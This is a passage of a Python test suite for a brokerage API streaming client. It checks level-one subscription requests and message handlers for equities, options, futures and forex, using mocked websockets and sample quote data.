@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'QUOTE', 'SUBS'))]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.LevelOneEquityFields.BID_PRICE,
StreamClient.LevelOneEquityFields.ASK_PRICE,
StreamClient.LevelOneEquityFields.QUOTE_TIME,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'QUOTE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,2,11'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'QUOTE', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_equity_subs(['GOOG', 'MSFT'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_quote_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'QUOTE',
'command': 'SUBS',
'timestamp': 1590186642440,
'content': [{
'key': 'GOOG',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '02079K107',
'1': 1404.92,
'2': 1412.99,
'3': 1411.89,
'4': 1,
'5': 2,
'6': 'P',
'7': 'K',
'8': 1309408,
'9': 2,
'10': 71966,
'11': 71970,
'12': 1412.76,
'13': 1391.83,
'14': ' ',
'15': 1410.42,
'16': 'q',
'17': True,
'18': True,
'19': 1412.991,
'20': 1411.891,
'21': 1309409,
'22': 18404,
'23': 18404,
'24': 0.0389,
'25': 'Alphabet Inc. - Class C Capital Stock',
'26': 'P',
'27': 4,
'28': 1396.71,
'29': 1.47,
'30': 1532.106,
'31': 1013.536,
'32': 28.07,
'33': 6.52,
'34': 5.51,
'35': 122.0,
'36': 123.0,
'37': 123123.0,
'38': 123214.0,
'39': 'NASD',
'40': ' ',
'41': True,
'42': True,
'43': 1410.42,
'44': 699,
'45': 57600,
'46': 18404,
'47': 1.48,
'48': 'Normal',
'49': 1410.42,
'50': 1590191970734,
'51': 1590191966446,
'52': 1590177600617
}, {
'key': 'MSFT',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '594918104',
'1': 183.65,
'2': 183.7,
'3': 183.65,
'4': 3,
'5': 10,
'6': 'P',
'7': 'P',
'8': 20826898,
'9': 200,
'10': 71988,
'11': 71988,
'12': 184.46,
'13': 182.54,
'14': ' ',
'15': 183.51,
'16': 'q',
'17': True,
'18': True,
'19': 182.65,
'20': 182.7,
'21': 20826899,
'22': 18404,
'23': 18404,
'24': 0.0126,
'25': 'Microsoft Corporation - Common Stock',
'26': 'K',
'27': 4,
'28': 183.19,
'29': 0.14,
'30': 190.7,
'31': 119.01,
'32': 32.3555,
'33': 2.04,
'34': 1.11,
'35': 122.0,
'36': 123.0,
'37': 123123.0,
'38': 123214.0,
'39': 'NASD',
'40': '2020-05-20 00:00:00.000',
'41': True,
'42': True,
'43': 183.51,
'44': 16890,
'45': 57600,
'46': 18404,
'48': 'Normal',
'47': 1.49,
'49': 183.51,
'50': 1590191988960,
'51': 1590191988957,
'52': 1590177600516
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'QUOTE', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_equity_handler(handler)
self.client.add_level_one_equity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'QUOTE',
'command': 'SUBS',
'timestamp': 1590186642440,
'content': [{
'key': 'GOOG',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '02079K107',
'BID_PRICE': 1404.92,
'ASK_PRICE': 1412.99,
'LAST_PRICE': 1411.89,
'BID_SIZE': 1,
'ASK_SIZE': 2,
'ASK_ID': 'P',
'BID_ID': 'K',
'TOTAL_VOLUME': 1309408,
'LAST_SIZE': 2,
'TRADE_TIME': 71966,
'QUOTE_TIME': 71970,
'HIGH_PRICE': 1412.76,
'LOW_PRICE': 1391.83,
'BID_TICK': ' ',
'CLOSE_PRICE': 1410.42,
'EXCHANGE_ID': 'q',
'MARGINABLE': True,
'SHORTABLE': True,
'ISLAND_BID_DEPRECATED': 1412.991,
'ISLAND_ASK_DEPRECATED': 1411.891,
'ISLAND_VOLUME_DEPRECATED': 1309409,
'QUOTE_DAY': 18404,
'TRADE_DAY': 18404,
'VOLATILITY': 0.0389,
'DESCRIPTION': 'Alphabet Inc. - Class C Capital Stock',
'LAST_ID': 'P',
'DIGITS': 4,
'OPEN_PRICE': 1396.71,
'NET_CHANGE': 1.47,
'HIGH_52_WEEK': 1532.106,
'LOW_52_WEEK': 1013.536,
'PE_RATIO': 28.07,
'DIVIDEND_AMOUNT': 6.52,
'DIVIDEND_YIELD': 5.51,
'ISLAND_BID_SIZE_DEPRECATED': 122.0,
'ISLAND_ASK_SIZE_DEPRECATED': 123.0,
'NAV': 123123.0,
'FUND_PRICE': 123214.0,
'EXCHANGE_NAME': 'NASD',
'DIVIDEND_DATE': ' ',
'IS_REGULAR_MARKET_QUOTE': True,
'IS_REGULAR_MARKET_TRADE': True,
'REGULAR_MARKET_LAST_PRICE': 1410.42,
'REGULAR_MARKET_LAST_SIZE': 699,
'REGULAR_MARKET_TRADE_TIME': 57600,
'REGULAR_MARKET_TRADE_DAY': 18404,
'REGULAR_MARKET_NET_CHANGE': 1.48,
'SECURITY_STATUS': 'Normal',
'MARK': 1410.42,
'QUOTE_TIME_IN_LONG': 1590191970734,
'TRADE_TIME_IN_LONG': 1590191966446,
'REGULAR_MARKET_TRADE_TIME_IN_LONG': 1590177600617
}, {
'key': 'MSFT',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '594918104',
'BID_PRICE': 183.65,
'ASK_PRICE': 183.7,
'LAST_PRICE': 183.65,
'BID_SIZE': 3,
'ASK_SIZE': 10,
'ASK_ID': 'P',
'BID_ID': 'P',
'TOTAL_VOLUME': 20826898,
'LAST_SIZE': 200,
'TRADE_TIME': 71988,
'QUOTE_TIME': 71988,
'HIGH_PRICE': 184.46,
'LOW_PRICE': 182.54,
'BID_TICK': ' ',
'CLOSE_PRICE': 183.51,
'EXCHANGE_ID': 'q',
'MARGINABLE': True,
'SHORTABLE': True,
'ISLAND_BID_DEPRECATED': 182.65,
'ISLAND_ASK_DEPRECATED': 182.7,
'ISLAND_VOLUME_DEPRECATED': 20826899,
'QUOTE_DAY': 18404,
'TRADE_DAY': 18404,
'VOLATILITY': 0.0126,
'DESCRIPTION': 'Microsoft Corporation - Common Stock',
'LAST_ID': 'K',
'DIGITS': 4,
'OPEN_PRICE': 183.19,
'NET_CHANGE': 0.14,
'HIGH_52_WEEK': 190.7,
'LOW_52_WEEK': 119.01,
'PE_RATIO': 32.3555,
'DIVIDEND_AMOUNT': 2.04,
'DIVIDEND_YIELD': 1.11,
'ISLAND_BID_SIZE_DEPRECATED': 122.0,
'ISLAND_ASK_SIZE_DEPRECATED': 123.0,
'NAV': 123123.0,
'FUND_PRICE': 123214.0,
'EXCHANGE_NAME': 'NASD',
'DIVIDEND_DATE': '2020-05-20 00:00:00.000',
'IS_REGULAR_MARKET_QUOTE': True,
'IS_REGULAR_MARKET_TRADE': True,
'REGULAR_MARKET_LAST_PRICE': 183.51,
'REGULAR_MARKET_LAST_SIZE': 16890,
'REGULAR_MARKET_TRADE_TIME': 57600,
'REGULAR_MARKET_TRADE_DAY': 18404,
'SECURITY_STATUS': 'Normal',
'REGULAR_MARKET_NET_CHANGE': 1.49,
'MARK': 183.51,
'QUOTE_TIME_IN_LONG': 1590191988960,
'TRADE_TIME_IN_LONG': 1590191988957,
'REGULAR_MARKET_TRADE_TIME_IN_LONG': 1590177600516
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# OPTION
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTION', 'SUBS'))]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTION',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' +
'20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,' +
'36,37,38,39,40,41')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTION', 'SUBS'))]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.LevelOneOptionFields.SYMBOL,
StreamClient.LevelOneOptionFields.BID_PRICE,
StreamClient.LevelOneOptionFields.ASK_PRICE,
StreamClient.LevelOneOptionFields.VOLATILITY,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTION',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,2,3,10'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTION', 'SUBS'))]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.LevelOneOptionFields.BID_PRICE,
StreamClient.LevelOneOptionFields.ASK_PRICE,
StreamClient.LevelOneOptionFields.VOLATILITY,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTION',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,2,3,10'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'OPTION', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'OPTION',
'timestamp': 1590244265891,
'command': 'SUBS',
'content': [{
'key': 'MSFT_052920C145',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0MSFT.ET00145000',
'1': 'MSFT May 29 2020 145 Call (Weekly)',
'2': 38.05,
'3': 39.05,
'4': 38.85,
'5': 38.85,
'6': 38.85,
'7': 38.581,
'8': 2,
'9': 7,
'10': 5,
'11': 57599,
'12': 53017,
'13': 38.51,
'14': 18404,
'15': 18404,
'16': 2020,
'17': 100,
'18': 2,
'19': 38.85,
'20': 6,
'21': 116,
'22': 1,
'23': 0.3185,
'24': 145,
'25': 'C',
'26': 'MSFT',
'27': 5,
'29': 0.34,
'30': 29,
'31': 6,
'32': 1,
'33': 0,
'34': 0,
'35': 0.1882,
'37': 'Normal',
'38': 38.675,
'39': 183.51,
'40': 'S',
'41': 38.55
}, {
'key': 'GOOG_052920C620',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0GOOG.ET00620000',
'1': 'GOOG May 29 2020 620 Call (Weekly)',
'2': 785.2,
'3': 794,
'7': 790.42,
'10': 238.2373,
'11': 57594,
'12': 68400,
'13': 790.42,
'14': 18404,
'16': 2020,
'17': 100,
'18': 2,
'20': 1,
'21': 6,
'24': 620,
'25': 'C',
'26': 'GOOG',
'27': 5,
'29': -0.82,
'30': 29,
'31': 6,
'32': 0.996,
'33': 0,
'34': -0.3931,
'35': 0.023,
'36': 0.1176,
'37': 'Normal',
'38': 789.6,
'39': 1410.42,
'40': 'S',
'41': 789.6
}]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'OPTION', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_option_handler(handler)
self.client.add_level_one_option_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'OPTION',
'timestamp': 1590244265891,
'command': 'SUBS',
'content': [{
'key': 'MSFT_052920C145',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0MSFT.ET00145000',
'DESCRIPTION': 'MSFT May 29 2020 145 Call (Weekly)',
'BID_PRICE': 38.05,
'ASK_PRICE': 39.05,
'LAST_PRICE': 38.85,
'HIGH_PRICE': 38.85,
'LOW_PRICE': 38.85,
'CLOSE_PRICE': 38.581,
'TOTAL_VOLUME': 2,
'OPEN_INTEREST': 7,
'VOLATILITY': 5,
'QUOTE_TIME': 57599,
'TRADE_TIME': 53017,
'MONEY_INTRINSIC_VALUE': 38.51,
'QUOTE_DAY': 18404,
'TRADE_DAY': 18404,
'EXPIRATION_YEAR': 2020,
'MULTIPLIER': 100,
'DIGITS': 2,
'OPEN_PRICE': 38.85,
'BID_SIZE': 6,
'ASK_SIZE': 116,
'LAST_SIZE': 1,
'NET_CHANGE': 0.3185,
'STRIKE_PRICE': 145,
'CONTRACT_TYPE': 'C',
'UNDERLYING': 'MSFT',
'EXPIRATION_MONTH': 5,
'TIME_VALUE': 0.34,
'EXPIRATION_DAY': 29,
'DAYS_TO_EXPIRATION': 6,
'DELTA': 1,
'GAMMA': 0,
'THETA': 0,
'VEGA': 0.1882,
'SECURITY_STATUS': 'Normal',
'THEORETICAL_OPTION_VALUE': 38.675,
'UNDERLYING_PRICE': 183.51,
'UV_EXPIRATION_TYPE': 'S',
'MARK': 38.55
}, {
'key': 'GOOG_052920C620',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0GOOG.ET00620000',
'DESCRIPTION': 'GOOG May 29 2020 620 Call (Weekly)',
'BID_PRICE': 785.2,
'ASK_PRICE': 794,
'CLOSE_PRICE': 790.42,
'VOLATILITY': 238.2373,
'QUOTE_TIME': 57594,
'TRADE_TIME': 68400,
'MONEY_INTRINSIC_VALUE': 790.42,
'QUOTE_DAY': 18404,
'EXPIRATION_YEAR': 2020,
'MULTIPLIER': 100,
'DIGITS': 2,
'BID_SIZE': 1,
'ASK_SIZE': 6,
'STRIKE_PRICE': 620,
'CONTRACT_TYPE': 'C',
'UNDERLYING': 'GOOG',
'EXPIRATION_MONTH': 5,
'TIME_VALUE': -0.82,
'EXPIRATION_DAY': 29,
'DAYS_TO_EXPIRATION': 6,
'DELTA': 0.996,
'GAMMA': 0,
'THETA': -0.3931,
'VEGA': 0.023,
'RHO': 0.1176,
'SECURITY_STATUS': 'Normal',
'THEORETICAL_OPTION_VALUE': 789.6,
'UNDERLYING_PRICE': 1410.42,
'UV_EXPIRATION_TYPE': 'S',
'MARK': 789.6
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LEVELONE_FUTURES
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES', 'SUBS'))]
await self.client.level_one_futures_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' +
'20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES', 'SUBS'))]
await self.client.level_one_futures_subs(['/ES', '/CL'], fields=[
StreamClient.LevelOneFuturesFields.SYMBOL,
StreamClient.LevelOneFuturesFields.BID_PRICE,
StreamClient.LevelOneFuturesFields.ASK_PRICE,
StreamClient.LevelOneFuturesFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,2,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES', 'SUBS'))]
await self.client.level_one_futures_subs(['/ES', '/CL'], fields=[
StreamClient.LevelOneFuturesFields.BID_PRICE,
StreamClient.LevelOneFuturesFields.ASK_PRICE,
StreamClient.LevelOneFuturesFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,2,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LEVELONE_FUTURES', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_futures_subs(['/ES', '/CL'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'LEVELONE_FUTURES',
'timestamp': 1590598762176,
'command': 'SUBS',
'content': [{
'key': '/ES',
'delayed': False,
'1': 2998.75,
'2': 2999,
'3': 2998.75,
'4': 15,
'5': 47,
'6': '?',
'7': '?',
'8': 1489587,
'9': 6,
'10': 1590598761934,
'11': 1590598761921,
'12': 3035,
'13': 2965.5,
'14': 2994.5,
'15': 'E',
'16': 'E-mini S&P 500 Index Futures,Jun-2020,ETH',
'17': '?',
'18': 2994,
'19': 4.25,
'20': 0.0014,
'21': 'XCME',
'22': 'Unknown',
'23': 3121588,
'24': 2999.25,
'25': 0.25,
'26': 12.5,
'27': '/ES',
'28': 'D,D',
'29': ('GLBX(de=1640;0=-1700151515301600;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'30': True,
'31': 50,
'32': True,
'33': 2994.5,
'34': '/ESM20',
'35': 1592539200000
}, {
'key': '/CL',
'delayed': False,
'1': 33.33,
'2': 33.34,
'3': 33.34,
'4': 13,
'5': 3,
'6': '?',
'7': '?',
'8': 325014,
'9': 2,
'10': 1590598761786,
'11': 1590598761603,
'12': 34.32,
'13': 32.18,
'14': 34.35,
'15': 'E',
'16': 'Light Sweet Crude Oil Futures,Jul-2020,ETH',
'17': '?',
'18': 34.14,
'19': -1.01,
'20': -0.0294,
'21': 'XNYM',
'22': 'Unknown',
'23': 270931,
'24': 33.35,
'25': 0.01,
'26': 10,
'27': '/CL',
'28': 'D,D',
'29': ('GLBX(de=1640;0=-17001600;' +
'1=-17001600d-15551640;7=d-16401555)'),
'30': True,
'31': 1000,
'32': True,
'33': 34.35,
'34': '/CLN20',
'35': 1592798400000
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'LEVELONE_FUTURES', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_futures_subs(['/ES', '/CL'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_futures_handler(handler)
self.client.add_level_one_futures_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'LEVELONE_FUTURES',
'timestamp': 1590598762176,
'command': 'SUBS',
'content': [{
'key': '/ES',
'delayed': False,
'BID_PRICE': 2998.75,
'ASK_PRICE': 2999,
'LAST_PRICE': 2998.75,
'BID_SIZE': 15,
'ASK_SIZE': 47,
'ASK_ID': '?',
'BID_ID': '?',
'TOTAL_VOLUME': 1489587,
'LAST_SIZE': 6,
'QUOTE_TIME': 1590598761934,
'TRADE_TIME': 1590598761921,
'HIGH_PRICE': 3035,
'LOW_PRICE': 2965.5,
'CLOSE_PRICE': 2994.5,
'EXCHANGE_ID': 'E',
'DESCRIPTION': 'E-mini S&P 500 Index Futures,Jun-2020,ETH',
'LAST_ID': '?',
'OPEN_PRICE': 2994,
'NET_CHANGE': 4.25,
'FUTURE_PERCENT_CHANGE': 0.0014,
'EXCHANGE_NAME': 'XCME',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 3121588,
'MARK': 2999.25,
'TICK': 0.25,
'TICK_AMOUNT': 12.5,
'PRODUCT': '/ES',
'FUTURE_PRICE_FORMAT': 'D,D',
'FUTURE_TRADING_HOURS': (
'GLBX(de=1640;0=-1700151515301600;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 50,
'FUTURE_IS_ACTIVE': True,
'FUTURE_SETTLEMENT_PRICE': 2994.5,
'FUTURE_ACTIVE_SYMBOL': '/ESM20',
'FUTURE_EXPIRATION_DATE': 1592539200000
}, {
'key': '/CL',
'delayed': False,
'BID_PRICE': 33.33,
'ASK_PRICE': 33.34,
'LAST_PRICE': 33.34,
'BID_SIZE': 13,
'ASK_SIZE': 3,
'ASK_ID': '?',
'BID_ID': '?',
'TOTAL_VOLUME': 325014,
'LAST_SIZE': 2,
'QUOTE_TIME': 1590598761786,
'TRADE_TIME': 1590598761603,
'HIGH_PRICE': 34.32,
'LOW_PRICE': 32.18,
'CLOSE_PRICE': 34.35,
'EXCHANGE_ID': 'E',
'DESCRIPTION': 'Light Sweet Crude Oil Futures,Jul-2020,ETH',
'LAST_ID': '?',
'OPEN_PRICE': 34.14,
'NET_CHANGE': -1.01,
'FUTURE_PERCENT_CHANGE': -0.0294,
'EXCHANGE_NAME': 'XNYM',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 270931,
'MARK': 33.35,
'TICK': 0.01,
'TICK_AMOUNT': 10,
'PRODUCT': '/CL',
'FUTURE_PRICE_FORMAT': 'D,D',
'FUTURE_TRADING_HOURS': (
'GLBX(de=1640;0=-17001600;' +
'1=-17001600d-15551640;7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 1000,
'FUTURE_IS_ACTIVE': True,
'FUTURE_SETTLEMENT_PRICE': 34.35,
'FUTURE_ACTIVE_SYMBOL': '/CLN20',
'FUTURE_EXPIRATION_DATE': 1592798400000
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LEVELONE_FOREX
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FOREX', 'SUBS'))]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FOREX',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'EUR/USD,EUR/GBP',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,' +
'20,21,22,23,24,25,26,27,28,29')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FOREX', 'SUBS'))]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'], fields=[
StreamClient.LevelOneForexFields.SYMBOL,
StreamClient.LevelOneForexFields.HIGH_PRICE,
StreamClient.LevelOneForexFields.LOW_PRICE,
StreamClient.LevelOneForexFields.MARKET_MAKER,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FOREX',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'EUR/USD,EUR/GBP',
'fields': '0,10,11,26'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FOREX', 'SUBS'))]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'], fields=[
StreamClient.LevelOneForexFields.HIGH_PRICE,
StreamClient.LevelOneForexFields.LOW_PRICE,
StreamClient.LevelOneForexFields.MARKET_MAKER,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FOREX',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'EUR/USD,EUR/GBP',
'fields': '0,10,11,26'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LEVELONE_FOREX', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'LEVELONE_FOREX',
'timestamp': 1590599267920,
'command': 'SUBS',
'content': [{
'key': 'EUR/GBP',
'delayed': False,
'assetMainType': 'FOREX',
'1': 0.8967,
'2': 0.8969,
'3': 0.8968,
'4': 1000000,
'5': 1000000,
'6': 19000000,
'7': 370000,
'8': 1590599267658,
'9': 1590599267658,
'10': 0.8994,
'11': 0.8896,
'12': 0.894,
'13': 'T',
'14': 'Euro/GBPound Spot',
'15': 0.8901,
'16': 0.0028,
'18': 'GFT',
'19': 2,
'20': 'Unknown',
'21': 'UNUSED',
'22': 'UNUSED',
'23': 'UNUSED',
'24': 'UNUSED',
'25': 'UNUSED',
'26': 'UNUSED',
'27': 0.8994,
'28': 0.8896,
'29': 0.8968
}, {
'key': 'EUR/USD',
'delayed': False,
'assetMainType': 'FOREX',
'1': 1.0976,
'2': 1.0978,
'3': 1.0977,
'4': 1000000,
'5': 2800000,
'6': 633170000,
'7': 10000,
'8': 1590599267658,
'9': 1590599267658,
'10': 1.1031,
'11': 1.0936,
'12': 1.0893,
'13': 'T',
'14': 'Euro/USDollar Spot',
'15': 1.0982,
'16': 0.0084,
'18': 'GFT',
'19': 2,
'20': 'Unknown',
'21': 'UNUSED',
'22': 'UNUSED',
'23': 'UNUSED',
'24': 'UNUSED',
'25': 'UNUSED',
'26': 'UNUSED',
'27': 1.1031,
'28': 1.0936,
'29': 1.0977
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'LEVELONE_FOREX', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_forex_handler(handler)
self.client.add_level_one_forex_handler(async_handler)
await self.client.handle_message()
expected_item = {
